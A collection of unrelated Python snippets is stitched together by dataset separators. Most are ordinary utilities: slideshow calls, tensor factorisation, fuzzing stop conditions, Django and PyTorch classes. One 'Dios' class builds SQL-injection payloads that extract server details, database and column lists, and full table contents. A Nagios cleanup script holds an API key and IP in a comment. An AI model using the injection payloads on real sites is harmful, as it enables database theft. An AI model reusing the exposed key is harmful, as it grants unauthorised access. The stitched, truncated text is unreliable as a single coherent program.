#out = director.animSceneSequential("/home/jmramoss/hd/res_slideshow/tests/2x2")
#out = director.animSceneSequential("/home/jmramoss/hd/res_slideshow/tests/3x3")
#out = director.animSceneSequential("/home/jmramoss/hd/res_slideshow/tests/4x4")
#out = director.animSceneSequential("/home/jmramoss/hd/res_slideshow/tests/5x5")
#out = director.animSceneSequential("/home/jmramoss/hd/res_slideshow/tests/6x6")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/6x6")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/5x5")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/4x4")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/3x3")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/2x2")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/6x6")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/5x5")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/4x4")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/3x3")
#out = director.animSceneDeleiteAllPhotos("/home/jmramoss/hd/res_slideshow/tests/2x2")
#out = director.animSlideshow("/home/jmramoss/hd/res_slideshow/tests/6x6")
#out = director.animSlideshow("/home/jmramoss/hd/res_slideshow/unai_colegio_primaria/Tutoria_1A_2017_2018/01_21dic17_bailamos/.bak2")
out = director.animSlideshow("/media/jmramoss/TOSHIBA EXT13/res_slideshow/unai_colegio_primaria/Tutoria_2A_2018_2019/02/jpg/.bak")
print(str(out))
#director.addBgSound("/media/jmramoss/ALMACEN/mp3/Bruno_Mars_-_24K_Magic_Official_Video[myplaylist-youtubemp3.com].mp3", "metal")
#director.saveMovie(True)
| nilq/baby-python | python |
from collections import defaultdict
import codecs
import csv
import json
by_verb = defaultdict(set)
with codecs.open('data.csv', encoding='utf-8', errors='ignore') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
verbs = [
v.strip()
for v_semi in row['verb'].lower().split(';')
for v in v_semi.split(',')
if v.strip() and v not in ('na', 'n/a')
]
for v in verbs:
by_verb[v].add(row['reqId'])
req_set = {reqId for reqs in by_verb.values() for reqId in reqs}
nodes = [{'id': v, 'label': v, 'color': 'red'} for v in by_verb]
nodes.extend({'id': req, 'label': req, 'color': 'lightblue'}
for req in req_set)
edges = [{'from': v, 'to': req}
for v, reqs in by_verb.items() for req in reqs]
print("var data = {")
print("nodes: new vis.DataSet({0}),".format(json.dumps(nodes)))
print("edges: new vis.DataSet({0})".format(json.dumps(edges)))
print("};")
| nilq/baby-python | python |
# import numpy as np
#
# ranNUm1 = np.random.random([2,3])
# print(ranNUm1)
# print(type(ranNUm1))#<class 'numpy.ndarray'> 内部元组数据类型必须一直
#
# arrTest = np.arange(32)
# print(arrTest)
# print(arrTest.reshape([4 , 8]))
| nilq/baby-python | python |
class Solution:
def solve(self, digits):
map = {
'2':'abc',
'3': 'def',
'4': 'ghi',
'5': 'jkl',
'6': 'mno',
'7': 'pqrs',
'8': 'tuv',
'9': 'wxyz'
}
output = []
def helper(combination, digit):
if not len(digit):
output.append(combination)
return
d = digit[0]
for letter in map[d]:
helper(combination + letter, digit[1:])
helper("", digits)
return output
| nilq/baby-python | python |
import random
import pickle
import torch
from torch import nn
class EncDecNetwork(nn.Module):
def __init__(self, encoder, decoder):
super(EncDecNetwork, self).__init__()
self.encoder = encoder
self.decoder = decoder
self._cuda = False
def full_forward(self):
raise NotImplementedError
def translate(self):
raise NotImplementedError
def cuda(self):
super(EncDecNetwork, self).cuda()
self.encoder.cuda()
self.decoder.cuda()
self._cuda = True
def initialize_params(self, init_range):
for p in self.parameters():
p.data.uniform_(-init_range, init_range)
def save_config_data(self, path):
checkpoint_data = self.get_checkpoint_data()
with open(path, 'wb') as f:
pickle.dump(checkpoint_data, f, -1)
def get_checkpoint_data(self):
raise NotImplementedError('get_checkpoint_data should be implemented by class that inherits EncDecNetwork')
| nilq/baby-python | python |
from opentrons import protocol_api
import json
import os
import math
import threading
from time import sleep
metadata = {'apiLevel': '2.5'}
NUM_SAMPLES = 24
SAMPLE_VOLUME = 475
def run(protocol: protocol_api.ProtocolContext):
source = protocol.load_labware('starlab_96_wellplate_2000ul', 2)
dest = protocol.load_labware('starlab_96_wellplate_2000ul', 3)
tiprack_1 = protocol.load_labware('opentrons_96_filtertiprack_200ul', 6)
m300 = protocol.load_instrument('p300_multi_gen2', 'left', tip_racks=[tiprack_1])
s = source.wells_by_name()['A1']
side = 1
loc = s.bottom(0.8).move(Point(x=side*2.5)) # mudei de 0.5>0.8 3>2.5
d = dest.wells_by_name()['A12']
m300.transfer(SAMPLE_VOLUME, loc, d)
| nilq/baby-python | python |
#!/usr/bin/python
# -*- coding: utf-8 -*-###
# Copyright (2018) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
'''
This script deletes all hosts and services except the localhost and services related localhost.
'''
import json
import requests
from time import sleep
def apply_config_and_restart_nagios(nagiosDetails):
retCode = 0
# Actual command :-
# response = requests.post('http://10.188.239.22/nagiosxi/api/v1/system/applyconfig?apikey=WhNXoMABXiR7WMNO3RMN6a34oGPp6TY2qLg8NPY0868k9U9r3be8kgrLVhahq8Da')
URI = "http://" + nagiosDetails["nagiosHost"] + "/nagiosxi/api/v1/system/applyconfig?apikey=" + nagiosDetails["apikey"]
# Apply config URI (used to restart Nagios XI)
print("Restarting nagios after deleting config")
response = requests.post(URI)
retVal = int(response.status_code)
retStat = json.loads(response.text)
#print(retStat)
try:
status = retStat["success"]
print("Restart Nagios with retVal :- " + str(retVal) + " and retStat :- " + str(retStat))
retCode = 0
except:
status = retStat["error"]
print("Restart Nagios with retVal :- " + str(retVal) + " and retStat :- " + str(retStat) + ". Plugin exiting.")
retCode = 1 # Something is wrong.
sleep(1)
sys.exit(1) # Exit for now.
return retCode
def delete_all_services_except_localhost_services(nagiosDetails):
# Get a list of all services to delete them one by one - Do not delete services of localhost
params = (
('apikey', nagiosDetails["apikey"]),
('pretty', '1'),
)
URI = 'http://' + nagiosDetails["nagiosHost"] + '/nagiosxi/api/v1/objects/servicestatus'
print("Get service list URI = ", URI)
response = requests.get(URI, params=params)
response = json.loads(response.content)
print("Num services - " + str(response["recordcount"]) )
serviceList = response["servicestatus"]
for service in serviceList:
# Do not delete services of localhost
if service["host_name"] == 'localhost':
continue
params = (
('apikey', nagiosDetails["apikey"]),
('pretty', '1'),
('host_name', service["host_name"]),
('service_description', service["name"]),
)
URI = 'http://' + nagiosDetails["nagiosHost"] + '/nagiosxi/api/v1/config/service'
print("Delete service URI = ", URI, "Deleting service - ", service["name"])
#sleep(5)
response = requests.delete(URI, params=params)
sleep(0.1)
return 0
def delete_all_hosts_except_localhost(nagiosDetails):
# Get a list of all hosts to delete them one by one - Do not delete localhost
params = (
('apikey', nagiosDetails["apikey"]),
('pretty', '1'),
)
URI = 'http://' + nagiosDetails["nagiosHost"] + '/nagiosxi/api/v1/objects/hoststatus'
print("Get host list URI = ", URI)
response = requests.get(URI, params=params)
response = json.loads(response.content)
print("Num hosts - " + str(response["recordcount"]) )
hostList = response["hoststatus"]
# JSON format differs if it is a single entry.
if int(response["recordcount"]) == 1:
print("Not deleting localhost")
return 0
else:
for host in hostList:
# Do not delete localhost
print("Hostname = ", host["name"])
if host["name"] == 'localhost':
continue
params = (
('apikey', nagiosDetails["apikey"]),
('pretty', '1'),
('host_name', host["name"])
)
URI = 'http://' + nagiosDetails["nagiosHost"] + '/nagiosxi/api/v1/config/host'
response = requests.delete(URI, params=params)
print("Delete host URI = ", URI, "Deleting host - ", host["name"])
#sleep(5)
response = requests.delete(URI, params=params)
sleep(0.1)
return 0
if __name__ == '__main__':
import sys
import argparse
from datetime import datetime, timedelta
parser = argparse.ArgumentParser(add_help=True, description='Usage')
parser.add_argument('-i','--input_file',dest='input_file', required=True,
help='Json file containing oneview and nagios details used for testing main module')
# Check and parse the input arguments into python's format
input = parser.parse_args()
with open(input.input_file) as data_file:
inputConfig = json.load(data_file)
nagiosDetails = inputConfig["nagios_config"]
delete_all_services_except_localhost_services(nagiosDetails)
apply_config_and_restart_nagios(nagiosDetails)
sleep(5)
delete_all_hosts_except_localhost(nagiosDetails)
apply_config_and_restart_nagios(nagiosDetails)
| nilq/baby-python | python |
# Copyright 2022 Garda Technologies, LLC. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Originally written by Valery Korolyov <fuzzah@tuta.io>
from typing import Callable, Dict, Optional, Tuple, Any
from time import time
import os
import logging
log = logging.getLogger(__name__)
from bugbane.modules.stats.fuzz.fuzz_stats import FuzzStats
class StopConditionError(Exception):
"""Exception class for errors that happen in stop condition related routines"""
class StopConditions:
"""
Class that holds time-based stop conditions
"""
registry: Dict[str, Callable[[FuzzStats, int], bool]] = {}
@classmethod
def register(cls, name: str) -> Callable[[FuzzStats, int], bool]:
"""Register stop condition in internal registry"""
def wrapper(
wrapped: Callable[[FuzzStats, int], bool]
) -> Callable[[FuzzStats, int], bool]:
if name in cls.registry:
log.warning("replacing '%s' in %s registry", name, cls.__name__)
cls.registry[name] = wrapped
return wrapped
return wrapper
@classmethod
def get(cls, wanted_condition: str) -> Callable[[FuzzStats, int], bool]:
"""Return stop condition function"""
if wanted_condition not in cls.registry:
raise TypeError(
f"stop condition {wanted_condition} is not registered in {cls.__name__}"
)
return cls.registry[wanted_condition]
@classmethod
def met(cls, wanted_condition: str, stats: FuzzStats, seconds: int) -> bool:
"""Check if stop condition met"""
return cls.get(wanted_condition)(stats, seconds)
@StopConditions.register("time_without_finds")
def time_without_finds(stats: FuzzStats, seconds: int) -> bool:
"""The last new path was found N seconds ago (across all instances)"""
now = int(time())
stamp = stats.last_path_timestamp
log.trace(
"now=%s, stamp=%s, now-stamp=%s seconds=%s", now, stamp, now - stamp, seconds
)
return stamp > 0 and (now - stamp) >= seconds
@StopConditions.register("real_run_time")
def real_run_time(stats: FuzzStats, seconds: int) -> bool:
"""Actual test time is N or more seconds"""
now = int(time())
return (now - stats.start_timestamp) >= seconds
@StopConditions.register("total_run_time")
def total_run_time(stats: FuzzStats, seconds: int) -> bool:
"""
Total run time (sum from all instances) is N or more seconds.
FuzzStats holds the most old fuzzer start timestamp, so it is assumed that
all fuzzers start at the same time.
"""
now = int(time())
return stats.num_instances * (now - stats.start_timestamp) >= seconds
def detect_required_stop_condition(
environ: Optional[Dict[str, str]] = None, bane_vars: Optional[Dict[str, Any]] = None
) -> Tuple[str, int]:
"""
Gets condition for stopping fuzzing job.
Returns tuple: (stop condition function name, time in seconds).
Note: bane_vars is not used as of now.
Return first detected:
env var CERT_FUZZ_DURATION set? -> time_without_finds with specified time
env var CERT_FUZZ_LEVEL set? -> time_without_finds with predefined time
env var FUZZ_DURATION set? -> real_run_time with specified time
-> real_run_time with 10 minutes
"""
env = environ or os.environ
bane_vars = bane_vars or {}
log.trace("env size is %d, vars size is %d", len(env), len(bane_vars))
cert_fuzz_duration = env.get("CERT_FUZZ_DURATION")
cert_fuzz_level = env.get("CERT_FUZZ_LEVEL")
ci_fuzz_duration = env.get("FUZZ_DURATION")
try:
if cert_fuzz_duration is not None:
return ("time_without_finds", int(cert_fuzz_duration))
cert_fuzz_levels_time_without_finds = {
4: 2 * 60 * 60, # 4 уровень контроля -> 2 часа без новых путей
3: 4 * 60 * 60,
2: 8 * 60 * 60,
}
if cert_fuzz_level is not None:
duration = cert_fuzz_levels_time_without_finds[int(cert_fuzz_level)]
return ("time_without_finds", duration)
if ci_fuzz_duration is not None:
return ("real_run_time", int(ci_fuzz_duration))
except ValueError as e:
raise StopConditionError(f"Bad environment variable value ({e})") from e
except KeyError as e:
supported_levels = ", ".join(
str(x) for x in cert_fuzz_levels_time_without_finds
)
raise StopConditionError(
f"Supported CERT_FUZZ_LEVEL values: {supported_levels}.\n"
"For other options please use CERT_FUZZ_DURATION=<seconds>"
) from e
log.warning("Wasn't able to detect stop condition. Using default of 10 minutes")
return ("real_run_time", 10 * 60)
| nilq/baby-python | python |
"""
Projects module.
By default, only projects that are listed in the configuration are
loaded automatically. See configuration variables:
*_PLUGINS_AUTOLOAD
*_PLUGINS_PROJECTS
"""
import logging
import importlib
from benchbuild.settings import CFG
LOG = logging.getLogger(__name__)
def discover():
if CFG["plugins"]["autoload"]:
project_plugins = CFG["plugins"]["projects"].value
for project_plugin in project_plugins:
try:
importlib.import_module(project_plugin)
except ImportError as import_error:
LOG.error("Could not find '%s'", project_plugin)
LOG.error("ImportError: %s", import_error.msg)
| nilq/baby-python | python |
# Copyright 2018, Michael DeHaan LLC
# License: Apache License Version 2.0 + Commons Clause
#---------------------------------------------------------------------------
# organization.py - a model of an organization like GitHub organizations
# holding lots of repos for import
#---------------------------------------------------------------------------
import json
from django.contrib.auth.models import Group, User
from django.db import models
from vespene.manager import Shared
from vespene.common.logger import Logger
from vespene.models import BaseModel, as_dict
from vespene.models.build import QUEUED, RUNNING, UNKNOWN
from vespene.manager.permissions import PermissionsManager
permissions = PermissionsManager()
LOG = Logger()
class Organization(models.Model, BaseModel):
class Meta:
db_table = 'organizations'
indexes = [
models.Index(fields=['name'], name='organization_name_idx'),
]
name = models.CharField(unique=True, max_length=512)
description = models.TextField(blank=True)
organization_type = models.CharField(max_length=100)
organization_identifier = models.CharField(max_length=512, help_text="example: 'vespene-io' for github.com/vespene-io/")
api_endpoint = models.CharField(max_length=512, blank=True, default="", help_text="blank, or https://{hostname}/api/v3 for GitHub Enterprise")
import_enabled = models.BooleanField(default=True)
import_without_dotfile = models.BooleanField(default=False)
overwrite_project_name = models.BooleanField(default=True)
overwrite_project_script = models.BooleanField(default=True)
overwrite_configurations = models.BooleanField(default=True)
allow_pipeline_definition = models.BooleanField(default=True)
allow_worker_pool_assignment = models.BooleanField(default=True)
auto_attach_ssh_keys = models.ManyToManyField('SshKey', related_name='+', blank=True, help_text="SSH keys to be assigned to imported projects")
default_worker_pool = models.ForeignKey('WorkerPool', related_name='+', null=False, on_delete=models.PROTECT)
force_rescan = models.BooleanField(default=False, help_text="rescan once at the next opportunity, ignoring refresh_minutes")
refresh_minutes = models.IntegerField(default=120)
scm_login = models.ForeignKey('ServiceLogin', related_name='organizations', on_delete=models.SET_NULL, null=True, help_text="... or add an SSH key in the next tab", blank=True)
worker_pool = models.ForeignKey('WorkerPool', related_name='organizations', null=False, on_delete=models.PROTECT)
created_by = models.ForeignKey(User, related_name='+', null=True, blank=True, on_delete=models.SET_NULL)
last_build = models.ForeignKey('Build', null=True, blank=True, related_name='last_build_for_organization', on_delete=models.SET_NULL)
active_build = models.ForeignKey('Build', null=True, blank=True, related_name='active_build_for_organization', on_delete=models.SET_NULL)
last_successful_build = models.ForeignKey('Build', null=True, blank=True, related_name='last_successful_build_for_organization', on_delete=models.SET_NULL)
def __str__(self):
return self.name
| nilq/baby-python | python |
#coding: utf-8
import sys
from common import reverse_items
if len(sys.argv) != 3:
print "Usage: ", sys.argv[0], "[input] [output]"
exit(1)
reverse_items(sys.argv[1], sys.argv[2])
| nilq/baby-python | python |
import binascii
class Dios:
startSQLi = "0x3C73716C692D68656C7065723E" # <sqli-helper>
endSQLi = "0x3C2F73716C692D68656C7065723E" # </sqli-helper>
endData = "0x3c656e642f3e" # <end/>
def build(self, query):
return f"(select+concat({self.startSQLi},(select+concat({query})),{self.endSQLi}))"
def dump_data(self, tables, columns, database, level=1):
response_query = ''
if level == 1:
column_query = ''
for column in columns:
column = column.strip(' ')
query = "0x" + self.strTohex(f"<{column}>");
query += f",{column},"
query += "0x" + self.strTohex(f"</{column}>");
column_query += query + ","
column_query = column_query.strip(",")
response_query = f"(SELECT+GROUP_CONCAT({column_query},{self.endData})+FROM+{database}.{tables})"
return response_query
def get_information(self,level=1):
if level == 1:
dios = f"(select+concat({self.startSQLi},(select+concat({self.hostname()},{self.port()},{self.user()},{self.version()},{self.database()},{self.os_version()},{self.mechine_version()},{self.base_dir()},{self.data_dir()},{self.ssl()},{self.openssl()},{self.symlink()},{self.socket()})),{self.endSQLi}))"
return dios
def show_columns(self, table_name, dbname, level=1):
if level == 1:
dios = f"(select+group_concat(column_name)+from+information_schema.columns+where+table_name=0x{self.strTohex(table_name)}+and+table_schema=0x{self.strTohex(dbname)})"
return dios
# Get all database
def databases(self, level=1):
if level == 1:
dios = f"(select+group_concat(DISTINCT(table_schema))+from+information_schema.columns)"
return dios
def strTohex(self, string):
hexa = binascii.hexlify(string.encode("utf-8"))
hexa = hexa.decode("utf-8")
return hexa
def hexTostr(self, hexa):
string = binascii.unhexlify(hexa.encode("utf-8"))
string = string.decode("utf-8")
return string
def addslashes(self, s):
d = {'"':'\\"', "'":"\\'", "\0":"\\\0", "\\":"\\\\"}
return ''.join(d.get(c, c) for c in s)
# Method get Information from target
# Hostname
def hostname(self, level=1):
if level == 1:
hostname = f"0x{self.strTohex('<hostname()>')},/*!00000@@hostname*/,0x{self.strTohex('</hostname()>')}"
# print(hostname, level)
return hostname
# Port
def port(self, level=1):
if level == 1:
port = f"0x{self.strTohex('<port()>')},/*!00000@@port*/,0x{self.strTohex('</port()>')}"
return port
# Version
def version(self, level=1):
if level == 1:
version = f"0x{self.strTohex('<version>')},/*!00000@@version*/,0x{self.strTohex('</version>')}"
return version
# User
def user(self, level=1):
if level == 1:
user = f"0x{self.strTohex('<user()>')},/*!00000user()*/,0x{self.strTohex('</user()>')}"
return user
# Database
def database(self, level=1):
if level == 1:
database = f"0x{self.strTohex('<schema()>')},/*!00000schema()*/,0x{self.strTohex('</schema()>')}"
return database
# os_version
def os_version(self, level=1):
if level == 1:
os_version = f"0x{self.strTohex('<os_version>')},/*!00000@@version_compile_os*/,0x{self.strTohex('</os_version>')}"
return os_version
# mechine_version
def mechine_version(self, level=1):
if level == 1:
mechine_version = f"0x{self.strTohex('<mechine_version>')},/*!00000@@VERSION_COMPILE_MACHINE*/,0x{self.strTohex('</mechine_version>')}"
return mechine_version
# base_dir
def base_dir(self, level=1):
if level == 1:
base_dir = f"0x{self.strTohex('<base_dir>')},/*!00000@@basedir*/,0x{self.strTohex('</base_dir>')}"
return base_dir
# data_dir
def data_dir(self, level=1):
if level == 1:
data_dir = f"0x{self.strTohex('<data_dir>')},/*!00000@@datadir*/,0x{self.strTohex('</data_dir>')}"
return data_dir
# ssl
def ssl(self, level=1):
if level == 1:
ssl = f"0x{self.strTohex('<ssl>')},/*!00000@@GLOBAL.have_ssl*/,0x{self.strTohex('</ssl>')}"
return ssl
# openssl
def openssl(self, level=1):
if level == 1:
openssl = f"0x{self.strTohex('<openssl>')},/*!00000@@GLOBAL.have_openssl*/,0x{self.strTohex('</openssl>')}"
return openssl
# symlink
def symlink(self, level=1):
if level == 1:
symlink = f"0x{self.strTohex('<symlink>')},/*!00000@@GLOBAL.have_symlink*/,0x{self.strTohex('</symlink>')}"
return symlink
# socket
def socket(self, level=1):
if level == 1:
socket = f"0x{self.strTohex('<socket>')},/*!00000@@socket*/,0x{self.strTohex('</socket>')}"
return socket
| nilq/baby-python | python |
'''
Created on Nov 11, 2018
@author: nilson.nieto
'''
lst =[1,2,3,4,5,6,7]
print(list(map(lambda a : a**2,lst))) | nilq/baby-python | python |
import warnings
import numpy as np
from hottbox.algorithms.decomposition.cpd import BaseCPD
from hottbox.core.structures import Tensor
from hottbox.core.operations import khatri_rao, hadamard
from hottbox.utils.generation.basic import super_diag_tensor
# TODO: Organise this better - lazy work around used
class CMTF(BaseCPD):
""" Coupled Matrix and Tensor factorization for two ``Tensors`` of order n and 2 with respect to a specified `rank`.
Computed via alternating least squares (ALS)
Parameters
----------
max_iter : int
Maximum number of iteration
epsilon : float
Threshold for the relative error of approximation.
tol : float
Threshold for convergence of factor matrices
random_state : int
verbose : bool
If True, enable verbose output
Attributes
----------
cost : list
A list of relative approximation errors at each iteration of the algorithm.
References
----------
- Acar, Evrim, Evangelos E. Papalexakis, Gozde Gurdeniz, Morten A. Rasmussen,
Anders J. Lawaetz, Mathias Nilsson and Rasmus Bro.
“Structure-revealing data fusion.” BMC Bioinformatics (2013).
- Jeon, Byungsoo & Jeon, Inah & Sael, Lee & Kang, U. (2016).
SCouT: Scalable coupled matrix-tensor factorization—Algorithm and discoveries.
Int. Conf. Data Eng.. 811-822. 10.1109/ICDE.2016.7498292.
"""
# TODO: change init use requiring a change in TensorCPD
def __init__(self, max_iter=50, epsilon=10e-3, tol=10e-5,
random_state=None, verbose=False) -> None:
super(CMTF, self).__init__(init='random',
max_iter=max_iter,
epsilon=epsilon,
tol=tol,
random_state=random_state,
verbose=verbose)
self.cost = []
def copy(self):
""" Copy of the CPD algorithm as a new object """
new_object = super(CMTF, self).copy()
new_object.cost = []
return new_object
@property
def name(self):
""" Name of the decomposition
Returns
-------
decomposition_name : str
"""
decomposition_name = super(CMTF, self).name
return decomposition_name
def decompose(self, tensor, mlst, rank):
""" Performs factorisation using ALS on the two instances of ``tensor``
with respect to the specified ``rank``
Parameters
----------
tensor : Tensor
Multi-dimensional data to be decomposed
mlst : List of `Tensor`
List of two-dimensional `Tensor` to be decomposed
rank : tuple
Desired Kruskal rank for the given ``tensor``. Should contain only one value.
If it is greater then any of dimensions then random initialisation is used
Returns
-------
(fmat_a, fmat_b, t_recon, m_recon) : List(np.ndarray) or np.ndarray
fmat_a, fmat_b are the list of components obtained by applying CMTF
t_recon, m_recon : The reconstructed tensor and list of matrices
"""
if not isinstance(tensor, Tensor):
raise TypeError("Parameter `tensor` should be `Tensor`!")
if not isinstance(mlst, list):
raise TypeError("Parameter `mlst` should be a list of `Tensor`!")
if not isinstance(rank, tuple):
raise TypeError("Parameter `rank` should be passed as a tuple!")
if len(rank) != 1:
raise ValueError("Parameter `rank` should be tuple with only one value!")
if not all(isinstance(m, Tensor) for m in mlst):
raise TypeError("Parameter `mlst` should be a list of `Tensor`!")
if not all(m.order == 2 for m in mlst):
raise ValueError("All elements of `mlst` should be of order 2. It is a list of matrices!")
modes = np.array([list(m.shape) for m in mlst])
num_modes = len(modes)
fmat_a, fmat_b = self._init_fmat(modes[:, 0], modes[:, 1], rank)
norm = tensor.frob_norm
for n_iter in range(self.max_iter):
# Update tensor factors
for i in range(num_modes):
_v = hadamard([np.dot(a_i.T, a_i) for k, a_i in enumerate(fmat_a) if k != i])
_v += fmat_b[i].T.dot(fmat_b[i])
kr_result = khatri_rao(fmat_a, skip_matrix=i, reverse=True)
_prod_a = np.concatenate([tensor.unfold(i, inplace=False).data, mlst[i].data], axis=1)
_prod_b = np.concatenate([kr_result.T, fmat_b[i].T], axis=1).T
fmat_a[i] = _prod_a.dot(_prod_b).dot(np.linalg.pinv(_v))
for i in range(num_modes):
fmat_b[i] = mlst[i].data.T.dot(np.linalg.pinv(fmat_a[i]).T)
t_recon, m_recon = self._reconstruct(fmat_a, fmat_b, num_modes)
residual = np.linalg.norm(tensor.data-t_recon.data)
for i in range(num_modes):
residual += np.linalg.norm(mlst[i].data-m_recon[i].data)
self.cost.append(abs(residual)/norm)
if self.verbose:
print('Iter {}: relative error of approximation = {}'.format(n_iter, self.cost[-1]))
# Check termination conditions
if self.cost[-1] <= self.epsilon:
if self.verbose:
print('Relative error of approximation has reached the acceptable level: {}'
.format(self.cost[-1]))
break
if self.converged:
if self.verbose:
print('Converged in {} iteration(s)'.format(len(self.cost)))
break
if self.verbose and not self.converged and self.cost[-1] > self.epsilon:
print('Maximum number of iterations ({}) has been reached. '
'Variation = {}'.format(self.max_iter, abs(self.cost[-2] - self.cost[-1])))
# TODO: possibly make another structure
return fmat_a, fmat_b, t_recon, m_recon
@property
def converged(self):
""" Checks convergence of the CPD-ALS algorithm.
Returns
-------
bool
"""
# This insures that the cost has been computed at least twice without checking iterations
try:
is_converged = abs(self.cost[-2] - self.cost[-1]) <= self.tol
except IndexError:
is_converged = False
return is_converged
def _init_fmat(self, shape_i, shape_j, rank):
""" Initialisation of matrices used in CMTF
Parameters
----------
shape_i : np.ndarray(int)
Shape[0] of all matrices
shape_j : np.ndarray(int)
Shape[1] of all matrices
rank : int
The rank specified for factorisation
Returns
-------
(fmat_a, fmat_b) : List(np.ndarray)
Two lists of the factor matrices
"""
self.cost = [] # Reset cost every time when method decompose is called
_r = rank[0]
if (np.array(shape_i) < _r).sum() != 0:
warnings.warn(
"Specified rank is greater then one of the dimensions of a tensor ({} > {}).\n"
"Factor matrices have been initialized randomly.".format(_r, shape_i), RuntimeWarning
)
fmat_a = [np.random.randn(i_n, _r) for i_n in shape_i]
fmat_b = [np.random.randn(j_n, _r) for j_n in shape_j]
return fmat_a, fmat_b
@staticmethod
def _reconstruct(fmat_a, fmat_b, n_mat):
""" Reconstruct the tensor and matrix after the coupled factorisation
Parameters
----------
fmat_a : List(np.ndarray)
Multidimensional data obtained from the factorisation
fmat_b : List(np.ndarray)
Multidimensional data obtained from the factorisation
n_mat : int
Number of matrices provided to fuse
Returns
-------
(core_tensor, lrecon) : np.ndarray or List(np.ndarray)
Reconstructed tensor and list of matrices obtained from the factorisation
"""
core_values = np.repeat(np.array([1]), fmat_a[0].shape[1])
_r = (fmat_a[0].shape[1], )
core_shape = _r * len(fmat_a)
core_tensor = super_diag_tensor(core_shape, values=core_values)
for mode, fmat in enumerate(fmat_a):
core_tensor.mode_n_product(fmat, mode=mode, inplace=True)
lrecon = [Tensor(fmat_a[i].dot(fmat_b[i].T)) for i in range(n_mat)]
return core_tensor, lrecon
def plot(self):
print('At the moment, `plot()` is not implemented for the {}'.format(self.name))
| nilq/baby-python | python |
import pathlib
import pandas as pd
from util import Util
# 指定した条件のPdを返す
class Dataset:
def __init__(
self,
feature_names,
target_name="target",
train_years=None,
test_years=None,
cities=None,
):
if feature_names is None:
feature_names = self.get_all_feature_names()
# 目的変数名
self.target_name = target_name
self.train_years = train_years
self.test_years = test_years
self.cities = cities
# Datasetの中でのみ使用するカラム
self.secret_feature_names = ["県名", "date"]
self.feature_names = feature_names.copy()
for name in self.secret_feature_names:
if name in feature_names:
self.secret_feature_names.remove(name)
else:
self.feature_names.append(name)
base_dataset = Util.load_feature("basic_data")
datasets_list = []
for name in self.feature_names:
if name in base_dataset.columns:
datasets_list.append(base_dataset[name])
else:
feature = Util.load_feature(name)
datasets_list.append(feature)
self.dataset = pd.DataFrame().join(datasets_list, how="outer")
@classmethod
def get_all_feature_names(cls):
# すべての特徴の名前を取得する
data = []
basic_data = Util.load_feature("basic_data")
globbed_files = pathlib.Path("./../features/").glob("*.pkl")
for globbed_file in globbed_files:
file_name = globbed_file.name
if file_name == "basic_data.pkl":
continue
data.append(Util.load_feature(file_name[:-4]))
data = basic_data.join(data, how="outer")
return data.columns
# 年度を条件にして絞り込む
def __select_by_year(self, years, data=None):
def __to_year(data):
return data.year
if data is None:
data = self.dataset.copy()
if type(years) == int:
years = [years]
# 年度情報がないデータは削除
data = data.dropna(subset=["date"])
adopted_index = False
for year in years:
adopted_index = (adopted_index) | (data["date"].map(__to_year) == year)
return data[adopted_index]
# 県名を条件にして絞り込む
def __select_by_city(self, city_names, data=None):
if type(city_names) == str:
city_names = [city_names]
if data is None:
data = self.dataset.copy()
# 県名情報がないデータは削除
data = data.dropna(subset=["県名"])
return data[data["県名"].isin(city_names)]
# 年度と県名を条件にして絞り込み、コピーを返す
def get_data(self, year, city):
data = self.__select_by_year(year)
data = self.__select_by_city(city, data)
data = data.drop(self.secret_feature_names, axis=1)
data = data.dropna(subset=[self.target_name])
data = data.dropna()
return data
# 2008 ~ 2017年度のデータ
def get_train(self):
if self.train_years is not None and self.cities is not None:
return self.get_data(self.train_years, self.cities)
else:
return self.get_data([y for y in range(2008, 2018)], "tokyo")
# 2018, 2019年度のデータ
def get_test(self, option=None):
if self.test_years is not None and self.cities is not None:
return self.get_data(self.test_years, self.cities)
else:
return self.get_data([2018, 2019], "tokyo")
def add_past_day_data(self, days_ago, features=None):
if features is None:
features = list(self.dataset.columns.copy())
for name in self.secret_feature_names:
features.remove(name)
if type(days_ago) == int:
days_ago = [days_ago]
for i in days_ago:
for name in features:
self.dataset["p" + str(i) + name] = self.dataset[name].shift(-i)
| nilq/baby-python | python |
from openstatesapi.jurisdiction import make_jurisdiction
J = make_jurisdiction('ga')
J.url = 'http://georgia.gov'
| nilq/baby-python | python |
import numpy as np
import zmq
import logging
import time
from multiprocessing import Process
from sigvisa.infer.swap_rpc.sg_client import run_client
from sigvisa.infer.swap_rpc.swap_server import SwapServer
from sigvisa.infer.swap_rpc.swap_moves import crossover_uatemplates, crossover_event_region_move, swap_events_move
from sigvisa.infer.swap_rpc.serialization import serialize, deserialize
class SgSwapServer(SwapServer):
def __init__(self, *args, **kwargs):
super(SgSwapServer, self).__init__(*args, **kwargs)
self.scbs = {}
self.raw_signals = {}
def do_swap_helper(self, client1, client2):
socket1 = self.swap_sockets[client1]
socket2 = self.swap_sockets[client2]
# both clients should check in to be ready to receive commands
ack1 = socket1.recv()
ack2 = socket2.recv()
